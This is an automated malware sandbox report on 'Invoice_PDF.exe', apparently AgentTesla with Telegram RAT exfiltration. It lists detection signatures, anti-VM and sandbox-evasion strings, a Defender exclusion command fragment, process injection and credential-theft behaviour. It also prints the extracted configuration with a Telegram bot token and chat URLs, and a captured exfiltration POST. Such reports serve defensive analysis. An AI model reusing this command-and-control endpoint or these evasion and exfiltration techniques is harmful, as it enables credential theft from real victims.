
Windows Analysis Report Invoice_PDF.exe

Overview

General Information

Sample Name: Invoice_PDF.exe
Analysis ID: 532735
MD5: 1dcc43f272f66d8e5afe11e7276dd122
SHA1: cb6a88d1443e7cca944a4176e2a8ebc205f715e3
SHA256: 0c6a99b9327cbcb0f3c5b18bc93d347ec8adcb3686e562c515ee4388713e8ed7
Tags: agentteslaexe

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Telegram RAT
Yara detected AgentTesla
Yara detected AntiVM3
Antivirus / Scanner detection for submitted sample
Tries to steal Mail credentials (via file / registry access)
Initial sample is a PE file and has a suspicious name
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses the Telegram API (likely for C&C communication)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
.NET source code contains very large array initializations
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Yara detected Credential Stealer
JA3 SSL client fingerprint seen in connection with other malware
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • Invoice_PDF.exe (PID: 6140 cmdline: "C:\Users\user\Desktop\Invoice_PDF.exe" MD5: 1DCC43F272F66D8E5AFE11E7276DD122)
    • Invoice_PDF.exe (PID: 5944 cmdline: C:\Users\user\Desktop\Invoice_PDF.exe MD5: 1DCC43F272F66D8E5AFE11E7276DD122)
  • cleanup

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000003.00000002.519916492.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(17 entries in total)

Unpacked PEs

Source | Rule | Description | Author | Strings
3.0.Invoice_PDF.exe.400000.4.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
3.0.Invoice_PDF.exe.400000.4.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
3.2.Invoice_PDF.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
3.2.Invoice_PDF.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
3.0.Invoice_PDF.exe.400000.6.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(16 entries in total)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 3.0.Invoice_PDF.exe.400000.12.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1952161154", "Chat URL": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument"}
Source: Invoice_PDF.exe.5944.3.memstrmin | Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendMessage"}
Multi AV Scanner detection for submitted file
Source: Invoice_PDF.exe | Virustotal: Detection: 45%
Source: Invoice_PDF.exe | Metadefender: Detection: 48%
Source: Invoice_PDF.exe | ReversingLabs: Detection: 62%
Antivirus / Scanner detection for submitted sample
Source: Invoice_PDF.exe | Avira: detected
Source: 3.0.Invoice_PDF.exe.400000.12.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.Invoice_PDF.exe.400000.4.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.Invoice_PDF.exe.400000.6.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.2.Invoice_PDF.exe.400000.0.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.Invoice_PDF.exe.400000.10.unpack | Avira: Label: TR/Spy.Gen8
Source: 3.0.Invoice_PDF.exe.400000.8.unpack | Avira: Label: TR/Spy.Gen8
Source: Invoice_PDF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2
Source: Invoice_PDF.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 4x nop then jmp 09220F57h (this identical entry is listed 29 times in the report)

Networking:

Uses the Telegram API (likely for C&C communication)
Source: unknown | DNS query: name: api.telegram.org
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected:
    POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6d
    Host: api.telegram.org
    Content-Length: 1009
    Expect: 100-continue
    Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 149.154.167.220 149.154.167.220
Source: unknown | Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49813
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: http://DynDns.comDynDNS
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: http://PHCGWf.com
Source: Invoice_PDF.exe, 00000003.00000002.527261346.00000000035B9000.00000004.00000001.sdmp | String found in binary or memory: http://api.telegram.org
Source: Invoice_PDF.exe, 00000003.00000002.529774678.0000000006EFE000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | String found in binary or memory: http://www.chinhdo.com
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comE8
Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comgrito
Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: Invoice_PDF.exe, 00000000.00000002.275871817.0000000001717000.00000004.00000040.sdmp | String found in binary or memory: http://www.fontbureau.comoitu
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: Invoice_PDF.exe, 00000000.00000002.280561726.0000000007122000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: Invoice_PDF.exe, 00000003.00000002.527180057.00000000035A0000.00000004.00000001.sdmp | String found in binary or memory: https://87HMfkdDwCo1wEm.org
Source: Invoice_PDF.exe, 00000003.00000002.527027069.000000000354C000.00000004.00000001.sdmp | String found in binary or memory: https://87HMfkdDwCo1wEm.orgx
Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org
Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/
Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org/bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocumentdocument-----
Source: Invoice_PDF.exe, 00000003.00000002.527224881.00000000035A4000.00000004.00000001.sdmp | String found in binary or memory: https://api.telegram.org4
Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.271867261.0000000000402000.00000040.00000001.sdmp, Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: Invoice_PDF.exe, 00000003.00000002.525641259.0000000003251000.00000004.00000001.sdmp | String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
Source: unknown | HTTP traffic detected:
    POST /bot1900392974:AAEB_yGGlWksNcNC4Dg08OgUSlmDON2w098/sendDocument HTTP/1.1
    Content-Type: multipart/form-data; boundary=---------------------------8d9b5ce0c4c9d6d
    Host: api.telegram.org
    Content-Length: 1009
    Expect: 100-continue
    Connection: Keep-Alive
Source: unknown | DNS traffic detected: queries for: api.telegram.org
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49813 version: TLS 1.2

System Summary:

Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Invoice_PDF.exe (entry listed twice)
.NET source code contains very large array initializations
Source: 3.0.Invoice_PDF.exe.400000.12.unpack, <PrivateImplementationDetails>{5029162B-2D4E-489B-8212-1A5255E1EA59}/4695CF78-3B59-4037-B8EE-F86771E06890.cs | Large array initialization: .cctor: array initializer size 12005
Source: Invoice_PDF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function (process 0): 0_2_02E2CBB4, 0_2_02E2EFEA, 0_2_02E2EFF8, 0_2_02E26F21, 0_2_0914521B, 0_2_09142260, 0_2_09146AB0, 0_2_09146AC0, 0_2_09146D10, 0_2_09221380
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function (process 3): 3_2_01398560, 3_2_01390818, 3_2_0139C0FC, 3_2_0139E570, 3_2_0139B040, 3_2_01392BD0, 3_2_01394698, 3_2_0176CDF0, 3_2_0176DDA0, 3_2_01768858, 3_2_01764B78, 3_2_0176A760, 3_2_01760297, 3_2_01765500, 3_2_0176A0B8, 3_2_017E47A0, 3_2_017E3CCC, 3_2_017E4750, 3_2_017E4730, 3_2_017E46F0, 3_2_017E46B0, 3_2_017E5490
Source: Invoice_PDF.exe | Binary or memory string: OriginalFilename vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameTransactionalFileManager.dllf# vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.282580770.0000000009150000.00000004.00020000.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000000.00000002.277834680.0000000004029000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dll@ vs Invoice_PDF.exe
Source: Invoice_PDF.exe | Binary or memory string: OriginalFilename vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000003.00000002.521181081.00000000012F8000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000003.00000000.272301229.0000000000402000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameVotmPjzzoZkNsXdXaeSGCVVue.exe4 vs Invoice_PDF.exe
Source: Invoice_PDF.exe | Binary or memory string: OriginalFilenameOverlappedDa.exeB vs Invoice_PDF.exe
Source: Invoice_PDF.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: Invoice_PDF.exe | Virustotal: Detection: 45%
Source: Invoice_PDF.exe | Metadefender: Detection: 48%
Source: Invoice_PDF.exe | ReversingLabs: Detection: 62%
Source: Invoice_PDF.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\Invoice_PDF.exe "C:\Users\user\Desktop\Invoice_PDF.exe"
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Process created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exe (entry listed twice)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
Source: C:\Users\user\Desktop\Invoice_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Invoice_PDF.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor (entry listed twice)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Invoice_PDF.exe.log
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/1@1/1
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (entry listed twice)
Source: 3.0.Invoice_PDF.exe.400000.12.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor' (entry listed twice)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File read: C:\Windows\System32\drivers\etc\hosts (entry listed twice)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: Invoice_PDF.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Invoice_PDF.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: Invoice_PDF.exe, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.2.Invoice_PDF.exe.b90000.0.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 0.0.Invoice_PDF.exe.b90000.0.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.2.Invoice_PDF.exe.ed0000.1.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.11.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.5.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.13.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.9.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.1.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 3.0.Invoice_PDF.exe.ed0000.7.unpack, ObjectHolderList/ObjectHolderListGame.cs.Net Code: ObjectIdentifier System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 0_2_00B972C2 push esi; iretd
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 0_2_00B95076 push bx; ret
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 0_2_02E28748 push 8802EC9Eh; iretd
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 0_2_02E21C67 push ebx; iretd
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 0_2_02E21C7C push ebx; iretd
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 0_2_09143267 pushad ; ret
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 0_2_0922422D push FFFFFF8Bh; iretd
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 3_2_00ED72C2 push esi; iretd
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 3_2_00ED5076 push bx; ret
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 3_2_013997B0 pushad ; ret
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 3_2_01769460 push ss; retf
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 3_2_017ECF71 push esp; iretd
Source: initial sample | Static PE information: section name: .text entropy: 7.91118342624
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 0.2.Invoice_PDF.exe.304a634.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: Invoice_PDF.exe PID: 6140, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\Invoice_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 5136 | Thread sleep time: -35736s >= -30000s
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 2564 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6460 | Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6464 | Thread sleep count: 1903 > 30
Source: C:\Users\user\Desktop\Invoice_PDF.exe TID: 6464 | Thread sleep count: 7944 > 30
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Window / User API: threadDelayed 1903
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Window / User API: threadDelayed 7944
Source: C:\Users\user\Desktop\Invoice_PDF.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\Invoice_PDF.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Thread delayed: delay time: 35736
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: Invoice_PDF.exe, 00000000.00000002.276354246.0000000003021000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Process token adjusted: Debug
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Code function: 3_2_01399DF0 LdrInitializeThunk,
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Memory written: C:\Users\user\Desktop\Invoice_PDF.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Process created: C:\Users\user\Desktop\Invoice_PDF.exe C:\Users\user\Desktop\Invoice_PDF.exe
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp | Binary or memory string: SProgram Managerl
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd,
Source: Invoice_PDF.exe, 00000003.00000002.524833112.0000000001CA0000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Users\user\Desktop\Invoice_PDF.exe VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Invoice_PDF.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
